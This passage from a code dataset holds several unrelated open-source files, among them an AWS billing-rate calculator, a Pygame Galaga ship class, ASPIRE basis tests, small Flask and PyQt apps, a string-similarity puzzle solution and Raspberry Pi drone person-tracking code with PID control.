\"credentialsProfileName\": i.credentialsProfileName,\n \"accountNumber\": i.accountNumber,\n \"bucketBillingName\": i.bucketBillingName,\n \"lastKnownBillDate\": i.lastKnownBillDate,\n \"balanceAtDate\": i.balanceAtDate,\n \"applyDiscount\": i.applyDiscount,\n }\n try:\n calculator = AWSBillCalculator(i.accountName, globalConf, constantsDict, self.logger)\n lastStartDateBilledConsideredDatetime, CorrectedBillSummaryDict = calculator.CalculateBill()\n self.logger.debug(f\"lastStartDateBilledConsideredDatetime: {lastStartDateBilledConsideredDatetime}\")\n self.logger.debug(f\"CorrectedBillSummaryDict: {CorrectedBillSummaryDict}\")\n # data is a list, CorrectedBillSummaryDict is a dict, so we have to append it as a list of dict.\n # data += calculator.CorrectedMonthlyBillSummaryList\n data += [CorrectedBillSummaryDict]\n #\n # This is the code to calculate 6hr and 24hr spend rate\n dateNow = datetime.datetime.today()\n # Get cost in the last 6 hours\n sixHoursBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=6\n )\n calculator.setLastKnownBillDate(sixHoursBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummarySixHoursBeforeDict = calculator.CalculateBill()\n costInLastSixHours = CorrectedBillSummarySixHoursBeforeDict[\"Total\"]\n costRatePerHourInLastSixHours = costInLastSixHours / 6\n # Get cost in the last 24 hours\n oneDayBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=24\n )\n calculator.setLastKnownBillDate(oneDayBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummaryOneDayBeforeDict = calculator.CalculateBill()\n\n costInLastDay = 
CorrectedBillSummaryOneDayBeforeDict[\"Total\"]\n costRatePerHourInLastDay = costInLastDay / 24\n dataDelay = int(\n (time.mktime(dateNow.timetuple()) - time.mktime(lastStartDateBilledConsideredDatetime.timetuple()))\n / 3600\n )\n\n dataratedict = {\n \"accountName\": i.accountName,\n \"lastStartDateBilledConsideredDatetime\": lastStartDateBilledConsideredDatetime,\n \"dataDelay\": dataDelay,\n \"costInLastSixHours\": costInLastSixHours,\n \"costInLastDay\": costInLastDay,\n \"costRatePerHourInLastSixHours\": costRatePerHourInLastSixHours,\n \"costRatePerHourInLastDay\": costRatePerHourInLastDay,\n }\n datarate += [dataratedict]\n if self.verbose_flag:\n self.logger.debug(\"---\")\n self.logger.debug(\n f\"Alarm Computation for {calculator.accountName} Account Finished at {time.strftime('%c')}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(\n f\"Last Start Date Billed Considered: {lastStartDateBilledConsideredDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(f\"Now {dateNow.strftime('%m/%d/%y %H:%M')}\")\n self.logger.debug(f\"delay between now and Last Start Date Billed Considered in hours {dataDelay}\")\n self.logger.debug(\n f\"Six hours before that: {sixHoursBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"One day before that: {oneDayBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"Adjusted Total Now from Date of Last Known Balance: ${CorrectedBillSummaryDict['Total']}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Six Hours: ${costInLastSixHours}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Six Hours: ${costRatePerHourInLastSixHours} / h\")\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Day: ${costInLastDay}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Day: ${costRatePerHourInLastDay} / h\")\n self.logger.debug(\"---\")\n self.logger.debug(\"\")\n\n except Exception as detail:\n self.logger.exception(\"Exception in AWS BillingInfo call to acquire\")\n raise Exception(detail)\n\n return {\"AWS_Billing_Info\": pd.DataFrame(data), \"AWS_Billing_Rate\": pd.DataFrame(datarate)}\n\n\nSource.describe(\n BillingInfo,\n sample_config={\n \"billing_configuration\": \"/etc/decisionengine/modules.conf/AccountConstants_my.py\",\n \"dst_dir_for_s3_files\": \"/var/lib/decisionengine/awsfiles\",\n },\n)\n","repo_name":"HEPCloud/decisionengine_modules","sub_path":"src/decisionengine_modules/AWS/sources/BillingInfo.py","file_name":"BillingInfo.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"33948648146","text":"import pygame\nfrom settings import Settings\n\nclass Ship:\n \"\"\"A class to manage the ship\"\"\"\n\n def __init__(self, galaga_game):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n self.screen = galaga_game.screen\n self.screen_rect = galaga_game.screen.get_rect()\n self.settings = galaga_game.settings\n self.galaga_game = galaga_game\n\n # Load the ship image and get its rect\n self.image = pygame.image.load(self.settings.ship_image) \n self.rect = self.image.get_rect()\n\n # Start each new ship at the bottom center of the screen.\n self.rect.midbottom = self.screen_rect.midbottom\n\n # Movement flags; start with a ship that's not moving.\n self.moving_right = False \n self.moving_left = False\n\n def update(self):\n \"\"\"Update the ship's position based on the movement flag\"\"\"\n if 
self.moving_right:\n if self.rect.x <= self.galaga_game.screen_width - self.rect.width:\n self.rect.x += self.settings.ship_speed\n elif self.moving_left:\n if self.rect.x >= 0:\n self.rect.x -= self.settings.ship_speed\n\n def blitme(self):\n \"\"\"Draw the ship at its current location.\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"Center the ship on the screen\"\"\"\n self.rect.midbottom = self.screen_rect.midbottom\n self.x = float(self.rect.x)\n\n\n ","repo_name":"daviddelavega/GalagaPythonGame","sub_path":"galaga/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28968922841","text":"from unittest.case import SkipTest\n\nimport numpy as np\n\nfrom aspire.image import Image\nfrom aspire.utils import gaussian_2d, utest_tolerance\nfrom aspire.utils.coor_trans import grid_2d\nfrom aspire.utils.random import randn\n\n\nclass Steerable2DMixin:\n def testIndices(self):\n ell_max = self.basis.ell_max\n k_max = self.basis.k_max\n\n indices = self.basis.indices()\n\n i = 0\n\n for ell in range(ell_max + 1):\n if ell == 0:\n sgns = [1]\n else:\n sgns = [1, -1]\n\n for sgn in sgns:\n for k in range(k_max[ell]):\n self.assertTrue(indices[\"ells\"][i] == ell)\n self.assertTrue(indices[\"sgns\"][i] == sgn)\n self.assertTrue(indices[\"ks\"][i] == k)\n\n i += 1\n\n def testGaussianExpand(self):\n # Offset slightly\n x0 = 0.50\n y0 = 0.75\n\n # Want sigma to be as large as possible without the Gaussian\n # spilling too much outside the central disk.\n sigma = self.L / 8\n im1 = gaussian_2d(\n self.L, x0=x0, y0=y0, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype\n )\n\n coef = self.basis.expand(im1)\n im2 = self.basis.evaluate(coef)\n\n if isinstance(im2, Image):\n im2 = im2.asnumpy()\n im2 = im2[0]\n\n # For small L there's too much clipping at high freqs to get 1e-3\n # accuracy.\n if self.L < 32:\n atol = 1e-2\n else:\n atol = 1e-3\n\n self.assertTrue(im1.shape == im2.shape)\n self.assertTrue(np.allclose(im1, im2, atol=atol))\n\n def testIsotropic(self):\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n coef = self.basis.expand(im)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != 0]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.01)\n\n def testModulated(self):\n if self.L < 32:\n raise SkipTest\n\n ell = 1\n\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n g2d = grid_2d(self.L)\n\n for trig_fun in (np.sin, np.cos):\n im1 = im * trig_fun(ell * g2d[\"phi\"])\n\n coef = self.basis.expand(im1)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != ell]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.10)\n\n def testEvaluateExpand(self):\n coef1 = randn(self.basis.count, seed=self.seed)\n coef1 = coef1.astype(self.dtype)\n\n im = self.basis.evaluate(coef1)\n if isinstance(im, Image):\n im = im.asnumpy()\n coef2 = self.basis.expand(im)[0]\n\n self.assertTrue(coef1.shape == coef2.shape)\n self.assertTrue(np.allclose(coef1, coef2, atol=utest_tolerance(self.dtype)))\n\n def testAdjoint(self):\n u = randn(self.basis.count, seed=self.seed)\n u = u.astype(self.dtype)\n\n Au = 
self.basis.evaluate(u)\n if isinstance(Au, Image):\n Au = Au.asnumpy()\n\n x = randn(*self.basis.sz, seed=self.seed)\n x = x.astype(self.dtype)\n\n ATx = self.basis.evaluate_t(x)\n\n Au_dot_x = np.sum(Au * x)\n u_dot_ATx = np.sum(u * ATx)\n\n self.assertTrue(Au_dot_x.shape == u_dot_ATx.shape)\n self.assertTrue(np.isclose(Au_dot_x, u_dot_ATx))\n","repo_name":"yunpeng-shi/ASPIRE-Python","sub_path":"tests/_basis_util.py","file_name":"_basis_util.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"31280609196","text":"import sys\nfrom flask import Flask, jsonify, request, render_template\nfrom build_graphs import build_graphs \n# testfile = \"/Users/main/Desktop/Coding/castle_dash_test/dashboard_challenge/castle_users.json\"\n\napp = Flask(__name__)\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\n@app.route('/')\ndef home():\n\treturn render_template(\"index.html\")\n\nif __name__ == '__main__':\n\tinput = sys.argv[1]\n\tprint('input file name is ==>', input)\n\tbuild_graphs(input)\n\n\tapp.run(debug=True, use_reloader=False)\n","repo_name":"tsyaeger/cstl_dashboard","sub_path":"dashboard_challenge/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30091726150","text":"from UI import Ui_Frame\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget\nfrom PyQt5.QtGui import QPainter, QBrush, QFont\nfrom PyQt5.QtCore import Qt, QRectF, QPoint, QRect\nimport sys, random, math\n\nclass Win(QMainWindow, Ui_Frame):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.clickfoo)\n self.valueIsSet = False\n\n def clickfoo(self):\n self.dataInit()\n self.monteCarlo()\n self.update()\n\n def dataInit(self):\n self.valueIsSet = True\n self.N = int(self.lineEdit.text())\n self.P = int(self.lineEdit_2.text())\n\n def monteCarlo(self):\n allPoint = [[random.uniform(0, 1), random.uniform(0, 1)]\n for i in range(self.N)]\n counter = 0\n self.underPoint = []\n self.upperPoint = []\n for point in allPoint:\n if point[1] <= math.pow(point[0], self.P):\n counter += 1\n self.underPoint.append(point)\n else:\n self.upperPoint.append(point)\n Area = counter / self.N\n self.label_3.setText(\"面積大約為{}\".format(Area))\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.setFont(QFont(\"Monospace\", 15))\n painter.setPen(Qt.white)\n painter.drawLine(600, 150, 1100, 150)\n painter.drawLine(600, 150, 600, 650)\n # draw Function\n if self.valueIsSet:\n for i in range(1000):\n tmp = i / 1000\n painter.drawPoint(600 + tmp * 500, 150 + math.pow(tmp, self.P) * 500)\n for point in self.underPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 500, 150 + y * 500)\n painter.setPen(Qt.red)\n for point in self.upperPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 500, 150 + y * 500)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Win()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"eeeXun/homework","sub_path":"semester4/algorithm2-2/demo3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70198406821","text":"import math\nfrom collections import Counter\n\n \n\ndef solution(str1, str2):\n \n str1 = str1.upper()\n str2 = str2.upper()\n\n tmp = []\n 
tmp2 = []\n\n for i in range(0, len(str1)-1):\n if str1[i] == ' ' or str1[i+1] == ' ':\n continue\n if str1[i].isdigit() or str1[i+1].isdigit():\n continue\n if not(str1[i].isalpha()) or not(str1[i+1].isalpha()):\n continue\n\n tmp.append( str1[i] + str1[i+1] ) \n\n for i in range(0, len(str2)-1):\n if str2[i] == ' ' or str2[i+1] == ' ':\n continue\n if str2[i].isdigit() or str2[i+1].isdigit():\n continue\n if not(str2[i].isalpha()) or not(str2[i+1].isalpha()):\n continue\n\n tmp2.append( str2[i] + str2[i+1] )\n\n \n #print(tmp)\n #print(tmp2)\n\n\n if len(tmp) == 0 and len(tmp2) == 0: # edge case: everything was removed because of digits, spaces, or special characters \n ans = 65536\n return ans\n else:\n c1 = Counter(tmp)\n c2 = Counter(tmp2)\n \n intersec = c1 & c2\n intersec = sum(list(intersec.values()))\n union = c1 | c2\n union = sum(list(union.values()))\n \n ans = intersec/union * 65536\n '''\n common = 0\n\n adding = 0\n\n \n\n tmp3 = tmp2\n\n # logic to find the common elements of the two lists (cannot use set)\n\n for i in range(len(tmp)):\n for j in range(len(tmp3)):\n if tmp[i] == tmp3[j]:\n common += 1\n tmp3[j] == ''\n break\n\n \n\n adding = len(tmp) + len(tmp2) - common\n\n \n\n a = common\n\n b = adding\n \n #print(common, adding)\n\n ans = a/b * 65536\n\n ans = math.floor(ans) # floor \n\n '''\n\n '''\n\n tmp = set(tmp)\n\n tmp2 = set(tmp2)\n\n \n\n print(tmp)\n\n print(tmp2)\n\n \n\n a = len(tmp & tmp2) # intersection\n\n b = len(tmp | tmp2) # union\n\n \n\n ans = a/b * 65536\n\n '''\n\n #print(int(ans))\n return int(ans)\n\n\n#solution('FRANCE', 'french') \n#solution('handshake', 'shake hands')\n#solution('aa1+aa2', 'AAAA12') \n#solution('E=M*C^2', 'e=m*c^2')\n","repo_name":"JuyeolRyu/CodingTest","sub_path":"백수/algorithm/카카오/2018 KaKao Blind Recruitment/young/[1차] 뉴스 클러스터링/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71186578661","text":"import tflite_runtime.interpreter as interpreter\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport cv2 as cv\nimport sys\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport smbus2\nfrom centroidtracker import CentroidTracker\nfrom threading import Thread\nfrom picamera2 import Picamera2\n\nclass VideoStream:\n def __init__(self):\n global imgW,imgH\n self.piCam = Picamera2()\n self.piCam.configure(self.piCam.create_preview_configuration())\n self.piCam.start()\n self.frame = []\n self.stopEx = False\n imgH,imgW = self.piCam.capture_array().shape[:2]\n # def start(self): #to run on a separate thread\n # Thread(target=self.update,args=()).start()\n # return self\n\n # def update(self):\n # while not self.stopEx:\n # self.frame = self.piCam.capture_array()[:,:,:3]\n\n def update(self):\n self.frame = cv.rotate(self.piCam.capture_array()[:,:,:3],cv.ROTATE_180)\n \n def getInstance(self):\n return self\n\n def read(self):\n return np.array(self.frame.copy())\n\n def stop(self):\n self.stopEx = True\n \nclass Detect:\n def __init__(self, stream):\n global imgW,imgH\n labels = 'labelmap.txt'\n model_path = 'detect.tflite'\n \n self.is_tracking = False #TODO\n\n self.stream = stream\n self.model = interpreter.Interpreter(model_path=model_path,num_threads=4)\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n input_tensor_index = self.input_details[0]['index']\n\n self.mean = 127.5\n self.std = 127.5\n\n self.frame = []\n while len(self.frame) == 0:\n self.frame = stream.read()\n\n self.imgW_resize = 300 
#frame.shape[1]\n self.imgH_resize = 300 #frame.shape[0]\n\n # config = np.array([1,self.imgH_resize,self.imgW_resize,3],dtype=np.int32)\n # model.resize_tensor_input(input_tensor_index, config)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.confidence_thresh = 0.52\n self.boxes_id, self.classes_id, self.scores_id = 0, 1, 2\n\n self.stopped = False\n\n self.label = ''\n with open(labels,'r') as f:\n self.label = f.read()\n\n self.label = self.label.split('\\n')\n if self.label[0] == '???':\n del(self.label[0])\n def getInstance(self):\n return self\n def start(self,poly=None):\n self.stopped = False\n print(\" Started tracking .........\")\n self.ct = CentroidTracker()\n Thread(target=self.detect,args=(poly,)).start()\n\n def isIn(self,rects,points,cd = False):\n \n for i,(xmin,ymin,xmax,ymax) in enumerate(rects):\n flag = False\n for x,y in points:\n if x < xmin or x > xmax or y < ymin or y > ymax:\n flag = True\n break\n if not flag:\n if cd:\n dist = math.dist(((xmin+xmax)/2,(ymin+ymax)/2),points[0])\n print('distance -> ',dist)\n if dist < 30:\n return i\n continue\n return i\n return -1\n def detect(self,poly=None):\n global is_tracking,bbox_coordinates\n self.poly = poly\n locked_on = False\n if self.poly == None:\n is_tracking = False\n triggerDetection()\n\n global frames\n id = -1\n while not self.stopped:\n self.frame = self.stream.read()\n frame_inp = self.frame.copy()\n frame_inp = cv.resize(frame_inp,(self.imgW_resize,self.imgH_resize),cv.INTER_AREA)\n if self.input_details[0]['dtype'] == np.float32:\n frame_inp = (frame_inp - self.mean)/self.std\n frame_inp = np.expand_dims(frame_inp,axis=0)\n \n self.model.set_tensor(self.input_details[0]['index'],frame_inp)\n self.model.invoke()\n\n boxes = self.model.get_tensor(self.output_details[self.boxes_id]['index'])[0]\n classes = self.model.get_tensor(self.output_details[self.classes_id]['index'])[0]\n scores = self.model.get_tensor(self.output_details[self.scores_id]['index'])[0]\n\n scores_sorted = list(reversed(np.argsort(scores,axis=0)))\n \n\n d_rects = []\n # print(scores_sorted)\n for i in scores_sorted[:4]:\n # print('detected -> ',classes[i])\n if (scores[i] < self.confidence_thresh or scores[i] > 1.0) or int(classes[i]) != 0:\n continue\n ymin = int(max(1,imgH*boxes[i][0]))\n xmin = int(max(1,imgW*boxes[i][1]))\n ymax = int(min(imgH,imgH*boxes[i][2]))\n xmax = int(min(imgW,imgW*boxes[i][3]))\n if id == -1:\n cv.rectangle(self.frame,(xmin,ymin),(xmax,ymax),(255,0,0),3)\n d_rects.append([xmin,ymin,xmax,ymax])\n\n if id == -1:\n id = self.isIn(d_rects,self.poly)\n if id == -1 and not is_tracking:\n is_tracking = False\n triggerDetection()\n\n objects = self.ct.update(rects=d_rects)\n \n # if locked_on and id not in list(objects.keys()):\n # is_tracking = False\n # triggerDetection()\n #print('id -> ',id,' poly -> ',self.poly,' rects -> ',d_rects)\n if not locked_on and id != -1:\n id = int(list(objects.keys())[id])\n locked_on = True\n \n else:\n try:\n centroid = objects[id]\n text = \"Tracking tis idiot {}\".format(id)\n cv.putText(self.frame, text, (centroid[0] - 10, centroid[1] - 10),cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv.circle(self.frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n except:\n is_tracking = False\n triggerDetection()\n \n if locked_on:\n rect_id = self.isIn(d_rects,list([objects[id]]),cd=True)\n if(rect_id != -1):\n 
cv.rectangle(self.frame,d_rects[rect_id][:2],d_rects[rect_id][-2:],(255,0,0),3)\n bbox_coordinates = (d_rects[rect_id][:2],d_rects[rect_id][-2:])\n # if not self.is_tracking:\n # pass #TODO\n\n frames['detection'] = self.frame\n\n def stop(self):\n self.stopped = True\n\nclass PoseDetection: # 0 - jesus pose\n def __init__(self,stream):\n global imgW,imgH,is_tracking\n self.stream = stream\n \n model_path = 'pose.tflite'\n self.model = interpreter.Interpreter(model_path=model_path,num_threads=2)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.input_index = self.input_details[0]['index']\n self.output_index = self.output_details[0]['index']\n\n self.stopped = False\n\n self.imgH_resize,self.imgW_resize = self.input_details[0]['shape_signature'][1:3]\n print(self.imgH_resize,self.imgW_resize)\n print('\\n')\n print(imgW,imgH)\n # print(self.input_details)\n # print('\\n')\n # print(self.output_details)\n def getInstance(self):\n return self\n\n def start(self):\n self.stopped = False\n print(\" Started detecting pose .........\")\n Thread(target=self.getPose,args=()).start()\n\n def getRect(self):\n return self.rect\n\n def getPose(self):\n global frames,is_tracking,imgW,imgH\n hw = [imgH,imgW]\n while not self.stopped:\n frame = self.stream.read()\n frame_inp = cv.resize(frame,(self.imgH_resize,self.imgW_resize),interpolation=cv.INTER_AREA)\n frame_inp = np.array(np.expand_dims(frame_inp,axis=0),dtype=np.float32)\n\n self.model.set_tensor(self.input_index,frame_inp)\n self.model.invoke()\n\n keypoints = self.model.get_tensor(self.output_index)[0][0]\n for i, keypoint in enumerate(keypoints):\n keypoints[i][:2] = np.multiply(keypoint[:2],hw)\n # print('keypoints -> ',keypoints[i][:2])\n # print(keypoints)\n self.rect = self.estimatePose(keypoints)\n if(self.rect != None):\n # print('detected ')\n is_tracking = True\n triggerDetection()\n\n for keypoint in keypoints:\n if keypoint[2] < 0.3:\n continue\n cv.circle(frame,(int(keypoint[1]),int(keypoint[0])),4,(255,0,0),-1)\n frames['detection'] = frame\n\n \n def estimatePose(self,keypoints):\n points = np.arange(5,11)\n for point in points:\n if keypoints[point][2] < 0.4:\n return None\n dist_wrists = math.dist(keypoints[9][:2], keypoints[10][:2])\n dist_sum = math.dist(keypoints[5][:2],keypoints[6][:2])\n for i in range(2):\n dist_sum += math.dist(keypoints[5+i*2][:2],keypoints[5+(i+1)*2][:2])\n dist_sum += math.dist(keypoints[6+i*2][:2],keypoints[6+(i+1)*2][:2])\n if abs(dist_sum - dist_wrists) < dist_sum/7:\n return [keypoints[5][:2],keypoints[6][:2],keypoints[11][:2],keypoints[12][:2]]\n return None\n \n def stop(self):\n self.stopped=True\n\nclass PID:\n def __init__(self):\n global imgW, imgH,prev_box_mid\n self.kp = 0.5\n self.kd = 0.3\n self.ki = 0.001\n self.center = prev_box_mid = [imgW//2,imgH//2]\n self. 
total_area = imgW*imgH\n        self.prev_time = time.time()\n\n    def calcPID(self):\n        global bbox_coordinates,prev_box_mid,curr_mid, prev_area\n        curr_area = abs(bbox_coordinates[0][0] - bbox_coordinates[1][0])*abs(bbox_coordinates[0][1] - bbox_coordinates[1][1])\n        curr_mid = ((bbox_coordinates[0][0]+bbox_coordinates[1][0])/2,(bbox_coordinates[0][1]+bbox_coordinates[1][1])/2)\n\n        # PID correction -> rudder\n        errorX = self.center[0] - curr_mid[0]\n        dx = curr_mid[0] - prev_box_mid[0]\n        dt = time.time() - self.prev_time\n\n        pidPX = int(self.kp*errorX)\n        pidDX = int(self.kd*dx/dt)\n        pidIX = 0\n        if abs(errorX) < 50:\n            pidIX = int(self.ki*errorX)\n        prev_box_mid = curr_mid\n        pid_rudder = pidPX + pidDX + pidIX # sum of the P, D and I terms (the original added pidDX twice and never used pidPX)\n\n        errorZ = self.total_area - curr_area\n        dz = curr_area - prev_area\n        prev_area = curr_area # update the stored area so the next D term uses the real change\n        pidPZ = int(errorZ/1000)\n        pidDZ = int(self.kd*dz/dt)\n        pid_alieron = pidPZ + pidDZ\n\n        self.prev_time = time.time()\n        if curr_area > 0.4*self.total_area:\n            pid_alieron = 0\n\n        return pid_rudder,pid_alieron\n\n\ndef triggerDetection():\n    global detect,pdetect,is_tracking,switch_state\n    if is_tracking:\n        poly = pdetect.getRect()\n        pdetect.stop()\n        detect.start(poly)\n        switch_state = 1\n    else:\n        detect.stop()\n        pdetect.start()\n        switch_state=0\n\ndef read_from_arduino():\n    global data,data_available\n    try:\n        data = bus.read_i2c_block_data(ADDR,0,30)\n        data = [chr(s) for s in data]\n        data = ''.join(data).split('#')\n        data = data[1:-1]\n        # print(data)\n        data = [int(x) for x in data]\n        data_available = True\n    except:\n        print('An error has occurred')\n        data_available = False\n\ndef write_to_arduino(data):\n    global switch_state\n    data = data.copy()\n    if len(data) > 2:\n        data.append(switch_state)\n    data_str = '#'.join(map(str,data))\n    data = list(bytes(data_str,'utf-8'))\n    print(data_str,data)\n    try:\n        bus.write_i2c_block_data(ADDR, 0, data)\n    except:\n        print('error')\n\ndef record_footage():\n    global frames,stream\n    output= cv.VideoWriter('footage',cv.VideoWriter_fourcc(*'XVID'),25,frames['detection'])\n\n    while not stream.stopEx:\n        output.write(frames['detection'])\n    output.release()\n\n\ndef isr(channel):\n    global pdetect,detect,data_available,is_tracking\n    # print('#########################test############################')\n    if GPIO.input(channel):\n        ctr = 0\n        while not data_available and ctr < 10:\n            read_from_arduino()\n            ctr+=1\n        if data_available:\n            triggerDetection()\n    else:\n        data_available=False\n        pdetect.stop()\n        detect.stop()\n        is_tracking=False\n        write_to_arduino([0])\n\n######################### without external mcu\n\n# def calcPWM(channel):\n#     global pwm_vals,pwm_counts\n#     if GPIO.input(channel):\n#         started = time.time()\n#     else:\n#         pulse_width = time.time()-started\n#         pwm_vals[channel] += pulse_width\n#         pwm_counts[channel] += 1\n\n# def getPWM():\n#     global pwm_in,pwm_counts\n#     GPIO.add_event_detect(pwm,GPIO.BOTH,calcPWM)\n#     sleep(3)\n#     GPIO.remove_event_detect(pwm)\n#     if 0 in pwm_counts.values():\n#         return False\n#     pwm_vals = {x:float(pwm_vals[x]/pwm_counts[x]) for x in list(pwm_vals.keys())}\n#     print(pwm_vals)\n#     return True\n#pins normally high -> 3,5,7,24,26\n#pins 13 and 15\n# switch_pin = 3\n# pwm_in = (10,11,12,13,15) #pins for reading pwm signals -> (aileron, rudder)\n# pwm_out = (5,7,24,26,16)\n# pwm_vals = {10:1000,11:1000,12:1000,13:1000,15:1000}\n# pwm_counts = {10:0,11:0,12:0,13:0,15:0}\n\n#########################\nADDR = 0x09\ninterrupt = 7\n\nimgW = imgH = 0\nis_tracking = False\nframes = dict({'detection' : 
np.ones(shape=(640,480,3),dtype=np.float32)})\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(interrupt,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n\nGPIO.add_event_detect(interrupt,GPIO.BOTH,isr)\n\nbus = smbus2.SMBus(1)\n######################## without external mcu\n\n# GPIO.setup(pwm_in,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n# GPIO.setup(pwm_out,GPIO.OUT)\n# GPIO.output(pwm_out,GPIO.LOW)\n########################\n\ndata_available = False #input pwm values from arduino\ndata=[0] #format - option, rudder, elevator, aileron, gps select\nswitch_state = 0\n\nbbox_coordinates = [[0,0],[0,0]]\nprev_box_mid = (0,0)\nprev_area = imgH*imgW\n\nstream = VideoStream().getInstance()\nstream.update()\ntime.sleep(1)\npdetect = PoseDetection(stream=stream).getInstance()\ndetect = Detect(stream=stream).getInstance()\npid = PID()\n# print(detect,pdetect)\n\nprev_time = time.time()\n\n# Thread(target=record_footage,args=()).start() # uncomment for enabling video recording\nwhile True:\n stream.update()\n cv.imshow('detected',cv.cvtColor(frames['detection'],cv.COLOR_BGR2RGB))\n\n if(data_available):\n PidX,PidZ = pid.calcPID()\n PidX = -PidX\n # print(Pid)\n dup_data = data.copy()\n dup_data[1] += PidX\n # dup_data[3] += PidZ #Enable for aileron control\n # i2c_time = time.time()\n if(time.time() - prev_time > 0.50):\n write_to_arduino(dup_data)\n prev_time = time.time()\n # print('i2c time :',(time.time()-i2c_time)*1000)\n # print(is_tracking)\n if cv.waitKey(10) & 0xFF == 27 :\n stream.stop()\n pdetect.stop()\n detect.stop()\n break\nGPIO.cleanup()\ncv.destroyAllWindows()","repo_name":"kevinjacb/computer_vision_drone","sub_path":"fcCode.py","file_name":"fcCode.py","file_ext":"py","file_size_in_byte":15676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4218743940","text":"\"\"\"Courseware constants\"\"\"\n\nPLATFORM_EDX = \"edx\"\n# List of all currently-supported openedx platforms\nOPENEDX_PLATFORMS = (PLATFORM_EDX,)\n# Currently-supported openedx platforms in a ChoiceField-friendly format\nOPENEDX_PLATFORM_CHOICES = zip(OPENEDX_PLATFORMS, OPENEDX_PLATFORMS)\nEDX_ENROLLMENT_VERIFIED_MODE = \"verified\"\nEDX_ENROLLMENT_AUDIT_MODE = \"audit\"\nEDX_DEFAULT_ENROLLMENT_MODE = EDX_ENROLLMENT_AUDIT_MODE\nEDX_ENROLLMENTS_PAID_MODES = [\n EDX_ENROLLMENT_VERIFIED_MODE,\n]\nPRO_ENROLL_MODE_ERROR_TEXTS = (\n \"The [{}] course mode is expired or otherwise unavailable for course run\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n \"Specified course mode '{}' unavailable for course\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n)\n# The amount of minutes after creation that a openedx model record should be eligible for repair\nOPENEDX_REPAIR_GRACE_PERIOD_MINS = 5\n","repo_name":"mitodl/mitxonline","sub_path":"openedx/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"38825892415","text":"from application import app, db\nfrom application.models import Review, Film\nfrom flask import render_template, url_for\nfrom flask import redirect, request\nfrom application.forms import AddReview, 